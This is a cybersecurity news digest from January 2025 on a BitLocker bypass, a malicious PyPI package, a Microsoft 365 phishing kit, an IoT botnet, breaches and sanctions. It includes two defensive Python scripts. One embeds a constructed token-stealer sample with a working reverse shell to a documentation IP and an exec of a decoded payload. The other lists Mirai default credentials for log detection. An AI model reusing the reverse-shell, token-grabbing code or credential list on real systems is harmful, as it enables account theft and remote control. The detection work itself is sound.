What’s happening in cybersecurity today?
Windows BitLocker Flaw, PyPI Package, Discord Tokens, Backdoor, 2FA Phishing Kit, Microsoft 365, Outlook Crashes, IoT Botnet, Global DDoS Attacks, Otelier Data Breach, Marriott, Hilton, Hyatt, NewsBank Data Breach, Capital One Outage, Blacon High School, Cheshire UK, Garden of Life, Ransomware Attack, TikTok U.S. Ban, U.S. Sanctions, Chinese Cyber Actor, CISA, Software Understanding Gap, Rhino Linux, Google, Open Source Library, Software Composition Analysis.
Listen to the full podcast
Cyber Alerts
Cybersecurity researchers uncovered a serious flaw in Windows BitLocker that lets an attacker with brief physical access bypass the encryption without opening the laptop. The exploit, named “bitpixie,” downgrades the Windows Boot Manager to an older, still-signed version whose PXE soft-reboot bug leaves the Volume Master Key in memory, from which it can be read out and used to unlock the volume. As a result, attackers can access encrypted data without user credentials and without tampering with any hardware component. The attack only works against TPM-only protector configurations: requiring a pre-boot PIN (TPM+PIN) or a startup key, and applying the boot manager update together with the Secure Boot revocations that stop the old boot manager from loading, prevents it.
A malicious package called “pycord-self” was discovered on PyPI, targeting Discord developers by impersonating the popular “discord.py-self” library. The package steals Discord authentication tokens and installs a backdoor for remote control, letting attackers hijack accounts and keep persistent access to the developer’s machine. Developers are advised to verify package names against the project’s official documentation, pin dependencies by hash, and inspect package code for token reads, outbound connections and dynamic code execution before installing.
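As an added example for this item (not pycord-self’s code and not the researchers’ tooling): a static triage script that checks a requested dependency name against the one you meant to install, using PEP 503 name normalization, and walks a package’s source with Python’s `ast` module looking for the indicators described above: references to the Discord desktop client’s local token store, `exec`/`eval` of a decoded payload, shell execution, and network imports. The sample package source, the indicator tables and the function names are constructed for illustration and are assumptions, not the real malicious payload.

```python
"""Static triage of a Python dependency for token-theft and backdoor indicators.

Added example for this digest; the sample package below is constructed and is
not the real pycord-self payload.
"""
import ast
import re

# Path components under which the Discord desktop client stores its token.
TOKEN_STORE_PARTS = ("discord", "Local Storage", "leveldb")
NETWORK_MODULES = {"socket", "requests", "urllib", "http", "websocket", "aiohttp"}
SHELL_CALLS = {("subprocess", "run"), ("subprocess", "Popen"), ("subprocess", "call"),
               ("os", "system"), ("os", "popen")}
DECODERS = {("base64", "b64decode"), ("base64", "b85decode"),
            ("zlib", "decompress"), ("marshal", "loads")}
DYNAMIC_EXEC = {"exec", "eval"}


def normalize(name: str) -> str:
    """PEP 503 normalization: 'Discord.py_Self' and 'discord-py-self' compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def _dotted(call: ast.Call):
    """('module', 'attr') for a call shaped like base64.b64decode(...), else None."""
    func = call.func
    if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
        return (func.value.id, func.attr)
    return None


def findings_for(source: str) -> list[str]:
    """Walk the AST once and report every indicator found."""
    tree = ast.parse(source)
    out: list[str] = []
    imported: set[str] = set()
    strings: set[str] = set()

    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            imported.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            imported.add(node.module.split(".")[0])
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            strings.add(node.value)
        elif isinstance(node, ast.Call):
            func = node.func
            if isinstance(func, ast.Name) and func.id in DYNAMIC_EXEC:
                arg = node.args[0] if node.args else None
                if isinstance(arg, ast.Call) and _dotted(arg) in DECODERS:
                    out.append(f"line {node.lineno}: {func.id}() of a decoded payload")
                else:
                    out.append(f"line {node.lineno}: dynamic {func.id}()")
            elif _dotted(node) in SHELL_CALLS:
                mod, attr = _dotted(node)
                out.append(f"line {node.lineno}: shell execution via {mod}.{attr}()")

    # Two or more of the path components together is a strong token-theft signal.
    if sum(part in strings for part in TOKEN_STORE_PARTS) >= 2:
        out.append("references the Discord desktop token store path")
    net = sorted(imported & NETWORK_MODULES)
    if net:
        out.append(f"imports network module(s): {', '.join(net)}")
    return out


def triage(requested: str, intended: str, source: str) -> list[str]:
    """Name check plus source indicators for a dependency meant to be `intended`."""
    out = []
    if normalize(requested) != normalize(intended):
        out.append(f"name {requested!r} is not {intended!r} after normalization")
    return out + findings_for(source)


# Constructed sample of what a token stealer with a reverse shell looks like.
SAMPLE_PACKAGE = '''
import os, base64, socket, subprocess
LOCAL = os.path.join(os.getenv("APPDATA", ""), "discord", "Local Storage", "leveldb")

def grab():
    return [f for f in os.listdir(LOCAL) if f.endswith(".ldb")]

def beacon():
    s = socket.socket()
    s.connect(("203.0.113.10", 4444))
    while True:
        cmd = s.recv(1024).decode()
        s.send(subprocess.run(cmd, shell=True, capture_output=True).stdout)

exec(base64.b64decode("cHJpbnQoJ2hpJyk="))
'''

if __name__ == "__main__":
    for finding in triage("pycord-self", "discord.py-self", SAMPLE_PACKAGE):
        print(finding)
```

Run it against the unpacked sdist or wheel contents of anything you are about to install; a hit on the token store path or on `exec()` of a decoded blob in a Discord helper library is reason enough to stop and read the code by hand.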
Cybersecurity researchers have uncovered a new adversary-in-the-middle (AitM) phishing kit called Sneaky 2FA, designed to steal Microsoft 365 credentials and two-factor authentication codes. Discovered by Sekoia in December 2024, the kit is sold as phishing-as-a-service through Telegram and boasts advanced anti-bot measures. With nearly 100 phishing domains already detected, the kit serves convincing fake Microsoft sign-in pages that relay the victim’s password and one-time code to the real login flow, so OTP and push-based MFA does not stop it; only phishing-resistant methods such as FIDO2 security keys or passkeys, which bind the authentication to the genuine origin, defeat this kind of relay.
Microsoft has released a temporary fix for a bug that crashes classic Outlook when users write, reply to, or forward emails. The issue appeared after Outlook for Microsoft 365, 2021, 2019, and 2016 was updated to Version 2412 (Build 18324.20168) on January 7, and the crash is logged with exception code 0xc0000005 (an access violation). Microsoft says an official fix will ship in an update on January 28, 2025; until then, users can roll back to the previous version with a workaround run from the Command Prompt.
A newly discovered IoT botnet has been orchestrating large-scale DDoS attacks globally since late 2024, exploiting vulnerabilities in connected devices. Researchers warn that the botnet, using malware derived from Mirai and Bashlite, poses a significant threat to industries and critical infrastructure. The botnet targets devices like routers and IP cameras, exploiting weak passwords and remote code execution vulnerabilities to initiate attacks across North America, Europe, and Japan. Security experts recommend using updated firmware, changing default passwords, and isolating IoT devices to limit the damage caused by these attacks.
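An added example of the detection a defender would run over central logs for the botnet behaviour described above (not the researchers’ tooling; the log line format, the device and IP names and the function names are assumed): a scanner over constructed telnet login records that flags any source spraying username/password pairs from the leaked Mirai default list across several devices, and separately calls out every device that accepted one of those pairs, because that device still has its factory password.

```python
"""Flag Mirai-style default-credential spraying in telnet login records.

Added example for this digest. Log lines are constructed to mimic a central
syslog collecting telnet login events from several IoT devices.
"""
import re
from collections import defaultdict

# A few username/password pairs from the credential list in the leaked Mirai
# source; derivatives still try these first.
MIRAI_DEFAULTS = {
    ("root", "xc3511"), ("root", "vizxv"), ("root", "admin"), ("admin", "admin"),
    ("root", "888888"), ("root", "default"), ("support", "support"),
    ("admin", "1234"), ("ubnt", "ubnt"), ("root", "root"),
}

# Assumed line format: "<timestamp> <device> telnetd[pid]: login from <ip>
# user="..." pass="..." result=OK|FAIL"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<host>\S+) telnetd\[\d+\]: login from '
    r'(?P<src>\d{1,3}(?:\.\d{1,3}){3}) user="(?P<user>[^"]*)" '
    r'pass="(?P<pw>[^"]*)" result=(?P<result>OK|FAIL)$'
)


def is_default(user: str, pw: str) -> bool:
    """True if the pair is one a Mirai-derived bot will try."""
    return (user, pw) in MIRAI_DEFAULTS


def parse(line: str):
    """Return the event fields as a dict, or None for lines in another format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan(lines, min_default_hits: int = 3) -> dict:
    """Return {source_ip: summary} for sources that sprayed default credentials
    or logged in with one. A single default-credential success is always
    reported, since the device it hit is still on factory settings."""
    per_src = defaultdict(lambda: {"attempts": 0, "default_hits": 0,
                                   "hosts": set(), "compromised": set()})
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        s = per_src[ev["src"]]
        s["attempts"] += 1
        s["hosts"].add(ev["host"])
        if is_default(ev["user"], ev["pw"]):
            s["default_hits"] += 1
            if ev["result"] == "OK":
                s["compromised"].add(ev["host"])

    flagged = {}
    for src, s in per_src.items():
        if s["default_hits"] >= min_default_hits or s["compromised"]:
            flagged[src] = {
                "attempts": s["attempts"],
                "default_hits": s["default_hits"],
                "hosts": sorted(s["hosts"]),
                "compromised": sorted(s["compromised"]),
            }
    return flagged


# Constructed log sample: one scanner, one legitimate admin, one stray attempt.
SAMPLE_LOG = [
    '2025-01-20T03:14:07Z cam-03 telnetd[512]: login from 198.51.100.7 user="root" pass="xc3511" result=FAIL',
    '2025-01-20T03:14:09Z cam-03 telnetd[512]: login from 198.51.100.7 user="admin" pass="admin" result=FAIL',
    '2025-01-20T03:14:12Z rtr-01 telnetd[88]: login from 198.51.100.7 user="root" pass="vizxv" result=OK',
    '2025-01-20T03:14:15Z cam-07 telnetd[301]: login from 198.51.100.7 user="support" pass="support" result=FAIL',
    '2025-01-20T03:20:41Z rtr-01 telnetd[88]: login from 203.0.113.5 user="alice" pass="hunter2" result=FAIL',
    '2025-01-20T03:21:02Z rtr-01 telnetd[88]: login from 203.0.113.5 user="alice" pass="correct-pw" result=OK',
    '2025-01-20T03:30:00Z cam-03 telnetd[512]: login from 192.0.2.9 user="admin" pass="admin" result=FAIL',
    'garbage line that the parser should skip',
]

if __name__ == "__main__":
    for src, summary in scan(SAMPLE_LOG).items():
        print(src, summary)
```

In the sample only 198.51.100.7 is reported: four default-credential attempts across three devices, with rtr-01 accepting root/vizxv. That accepted login is the actionable finding; rotating the password on rtr-01 and on anything else that still answers to a Mirai-list pair removes the botnet’s easiest foothold before firmware updates or segmentation are even considered.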
Cyber Incidents
In 2024, Otelier, a hotel management software provider, suffered a significant data breach that exposed personal information from customers of well-known hotel chains like Marriott, Hilton, and Hyatt. The breach occurred after a threat actor gained unauthorized access to Otelier’s cloud-based system, which serves over 10,000 properties worldwide. Data compromised in the attack includes 437,000 customer email addresses, names, physical addresses, phone numbers, travel booking details, and in some cases, partial credit card information.
NewsBank recently reported a data breach to the Attorney General of Maine, revealing that sensitive personal identifiable information may have been accessed and acquired by an unauthorized third party. The company became aware of suspicious activity in its network on July 1, 2024, and initiated an investigation to assess the scope of the incident. The breach occurred between June 20, 2024, and July 1, 2024, during which sensitive data, such as names, Social Security numbers, driver’s license numbers, financial account information, and payment card details, could have been exposed.
Capital One experienced a major service outage that started on January 16, 2025, preventing thousands of customers from accessing their accounts. The outage was caused by a power failure at FIS Global, a third-party vendor responsible for some of Capital One’s services, including payment processing and deposits. Customers took to social media to voice their frustrations, with many unable to pay bills or access funds during the downtime. This incident follows a similar outage at Citibank and highlights the significant impact service disruptions have on both customers and businesses.
Blacon High School in Cheshire, United Kingdom, has temporarily closed after a ransomware attack compromised its systems. The school will remain shut for Monday and Tuesday, with an independent cyber-security firm working to assess the breach. Head teacher Rachel Hudson confirmed the attack occurred on Friday, and the school will reopen once it is safe, providing updates as the investigation progresses. Meanwhile, students are being asked to access lessons via Google Classroom.
Garden of Life, LLC recently notified consumers about a data breach that may have exposed personal information. On December 18, 2024, the company discovered that a third party had accessed the software used for processing payment card information on its website. This unauthorized access took place in July 2024, affecting consumers’ names, addresses, email addresses, credit card or debit card numbers, expiration dates, and CVV numbers.
Cyber News
On January 19, 2025, TikTok became temporarily unavailable in the U.S. due to a federal ban, following a Supreme Court ruling that requires the app’s Chinese parent company, ByteDance, to either sell TikTok or face a shutdown. The ban has left millions of users unable to access content or download the app, affecting other ByteDance products as well. The decision stems from national security concerns, particularly regarding data collection practices and potential Chinese government influence.
The U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) has sanctioned a Chinese cybersecurity company linked to the Salt Typhoon telecom intrusions and a Shanghai-based cyber actor tied to the recent breach of the Treasury’s own IT systems. That breach, carried out through a compromised BeyondTrust remote support deployment, reached over 400 computers and exfiltrated sensitive data, including policy and travel documents. The designations are part of the U.S. government’s ongoing effort to hold accountable those responsible for cyberattacks against U.S. infrastructure.
The U.S. government, led by agencies like CISA, DARPA, OUSD R&E, and NSA, is urging decisive steps to close the software understanding gap in national security and critical infrastructure systems. This gap stems from a lack of capacity to fully verify software, leaving mission operators unable to secure software by design, address defects quickly, or protect against exploits. The report emphasizes that countries like China and Russia have already invested heavily in understanding software to secure their own systems, and the U.S. must act to stay competitive in geopolitics.
Rhino Linux 2025.1 has arrived with a fresh set of features and updates, marking a significant step forward for the distribution. A standout addition is the “Hello Rhino” app, designed to assist with the post-installation experience, offering easy access to community links and documentation. The Unicorn Desktop has been enhanced with dynamic workspaces, streamlining workflow by automatically creating and removing workspaces as needed. Rhino Linux 2025.1 also ships with a sleek custom GRUB theme, providing a modern, cohesive visual experience from the moment the system boots.
Google has launched OSV-SCALIBR, an open-source software composition analysis library designed to help developers identify vulnerabilities and manage software inventory. The Go-based library is an extensible file system scanner that supports Linux, Windows, and macOS, and can analyze software packages, binaries, and source code. OSV-SCALIBR can be used as a standalone binary or integrated into Go projects, and it offers capabilities such as generating software bills of materials and vulnerability scanning.
Copyright © 2025 CyberMaterial. All Rights Reserved.